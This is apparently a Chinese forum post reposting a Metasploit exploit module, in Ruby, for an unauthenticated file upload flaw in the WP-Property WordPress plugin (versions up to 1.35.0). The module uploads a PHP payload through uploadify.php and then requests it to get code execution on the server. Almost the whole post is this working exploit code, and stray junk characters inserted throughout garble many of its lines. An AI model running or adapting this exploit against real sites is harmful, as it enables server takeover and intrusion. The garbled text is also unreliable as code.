WordPress WP-Property PHP 文件上传漏洞' S8 q2 `" i* z- h
* p, X, ~7 p1 a
## # This file is part of the Metasploit Framework and may be subject to
" w5 s3 ^8 V0 _+ o3 ~ o! N
' N' h+ j) O3 v X# redistribution and commercial restrictions. Please see the Metasploit0 ]2 I7 ]% n! y7 G5 Q9 x
/ E6 d# X. l0 `
# Framework web site for more information on licensing and terms of use.: U# x( E% s, T
- E+ h8 F5 M. @; `# http://metasploit.com/framework/ ##; N1 N: f: C" y+ T5 R# _- B
4 j" g/ h2 L' P/ c" p& e5 C" V $ N8 O* _( c) ]+ r( R. m0 S
$ @: o* _0 q, F
1 z/ ^6 L/ d( Y* D- c: g4 w: A: r9 M( C' i% V& x7 x+ _! C
require 'msf/core'+ X; j% T8 B/ Q6 N: n
require 'msf/core/exploit/php_exe'
/ k$ c7 D+ j o' T9 y1 i2 x; ~! v/ k8 O0 i
class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit: hpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability',
# H/ o9 u( h* b'Description' => %q{
+ W$ i" }1 `) q, h1 i$ S; G8 gThis module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' =>
3 n3 ?( X$ E+ M8 Z8 t1 ][
2 W3 K& o$ d7 g2 I'Sammy FORGIT', # initial discovery" { i) ]% T1 C1 |, a& ]7 G: ?2 o
'James Fitts <fitts.james[at]gmail.com>' # metasploit module* j4 b8 d8 q0 H6 l. U
],- X2 D9 N% _( [7 L5 @
'License' => MSF_LICENSE,
0 `: a' d) _$ g9 Y1 o'References' =>
! ~0 Z8 W G7 e[
% M% K6 y6 Z+ o/ n0 L% W' t[ 'OSVDB', '82656' ],0 l* v! q* f k1 c# k
[ 'BID', '53787' ],1 _. _- F* T( g* D" V
[ 'EDB', '18987'],
% f! K7 k6 {2 v8 Q" ?[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]2 q2 t5 L% d0 {! q j9 N+ `8 |, x
],
7 n- p- ?6 R; U/ i& K+ ~ ~3 A7 q'Payload' => k" l: \; o, ]7 |0 g3 T
{
9 j) O; R' ?' p$ l! c9 R" G Q" m L'BadChars' => "\x00",! y8 w- {& w1 U$ o/ u
},
0 u+ Q% a0 `) \ C2 d'Platform' => 'php',: o9 p. L" c2 b: {
'Arch' => ARCH_PHP,
% y9 B+ j& y# z0 n'Targets' =>& I( W+ k+ s& L
[/ j$ o& e7 a0 p7 K. g
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],. J7 Z* C+ P3 B# I6 A$ ~( I
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
4 F6 @8 Z' K2 K1 E1 u+ n9 W5 d' `],
6 G' H9 ?# ~2 z2 _/ ~( c- i6 o'DefaultTarget' => 0,
# V8 L) ]" |; r# `( m. N7 `'DisclosureDate' => 'Mar 26 2012'))3 I3 ^) R: ?" ]9 L, v
' h- h4 e6 {' {, m9 X3 P nregister_options(
+ F4 h8 M0 t. r. Y# g* |- I& z[
6 M0 m; V" T1 X$ g/ o$ P$ `# x6 y. SOptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
6 d3 j- ~( Q7 Y4 i8 w. K+ Y- j], self.class)
& p( P" P, E' {: `end
, T& \$ j( |- J# h$ d; A
) d8 Q$ n# w' U# x! k' kdef check/ _) I' q: `9 i$ t, Q' d2 O
uri = target_uri.path
3 K: @7 b+ o; t- T8 zuri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET',
8 Z' \ \3 o" j6 R* o- {2 o'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"/ J; n' D9 h8 s. k9 U* L) p
})7 u6 S/ }" O- P- F! ?4 f% F4 o
8 _$ o) k S& O" B6 @
if not res or res.code != 200
+ s- h# q: ?5 B/ Y1 O) Z* T* _return Exploit::CheckCode::Unknown# @/ m5 L. E& Y6 o) W% N
end9 G8 F$ L) y" p9 E7 c, i$ {
6 s* `1 [, { |2 s: J r+ |return Exploit::CheckCode::Appears
6 ~% d* R3 J; R6 `. O6 f+ f% v2 Q5 D5 gend
9 T6 @! ]; M9 s- p- w2 ^+ v% x! P' l' e
def exploit
B, i k0 ?9 G9 Turi = target_uri.path/ H! d4 n( S' F0 O/ l
uri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true)
! g! K# C. |& t+ q0 M3 A1 ^; I1 T7 l9 p" y; s3 K' Z( q1 |
data = Rex::MIME::Message.new
1 k- U1 a% @) Y, k, a4 U y* r# }' ?data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
( ^$ B3 `# I. T! I2 N8 ^0 C. J }data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
% J8 s( O* E% Y9 I& w! ^post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
0 T2 T, Q- r1 p# \& } X% m/ Y9 J( M5 R9 q, Y
print_status("#{peer} - Uploading payload #{@payload_name}")
/ L' {3 U X! o' r' rres = send_request_cgi({9 e% ]1 g8 g. I) Y
'method' => 'POST',
6 g# [6 x& J7 ?/ \% X'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
5 C3 R- w, a+ F. d6 k5 A. n'ctype' => "multipart/form-data; boundary=#{data.bound}",# q# G# {8 o" f; c9 e4 B5 D
'data' => post_data
' d/ v! H$ I; D* a})
2 E8 z2 W* k+ |
, E5 u b) G+ D+ p1 g0 aif not res or res.code != 200 or res.body !~ /#{@payload_name}/1 c: Q7 {, }1 q& k3 @; V- `. D
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")3 X! j5 @5 x5 Q6 T: n7 B
end
4 i6 s- |, I3 K V4 f- Z3 i0 q5 s7 ]7 Z$ g5 i' n! }; m
upload_uri = res.body7 g8 b& `9 [$ M6 `/ K! b( Y% q
6 Y3 R1 w' p6 H1 W; |
print_status("#{peer} - Executing payload #{@payload_name}")/ @3 Q1 C" x1 ? O. z
res = send_request_raw({
( a7 a$ d# N3 I* l* R* R% Z/ M3 e'uri' => upload_uri,
' c- ~& g$ W; N$ k t'method' => 'GET'7 r! s2 b+ X3 u, x" c" M9 p2 [- d
})
1 q9 _- X( p! w4 Mend
2 t- q" l' U' Aend
( ~+ N& k% d# l$ x e3 a6 u6 Z2 i4 X. Y3 a+ e! e7 | h! Y
不要问我这写的是什么 怎么利用 我是说msf.9 h4 u/ d4 S7 E& V, ^3 j
) b- @; M# O, W- T
|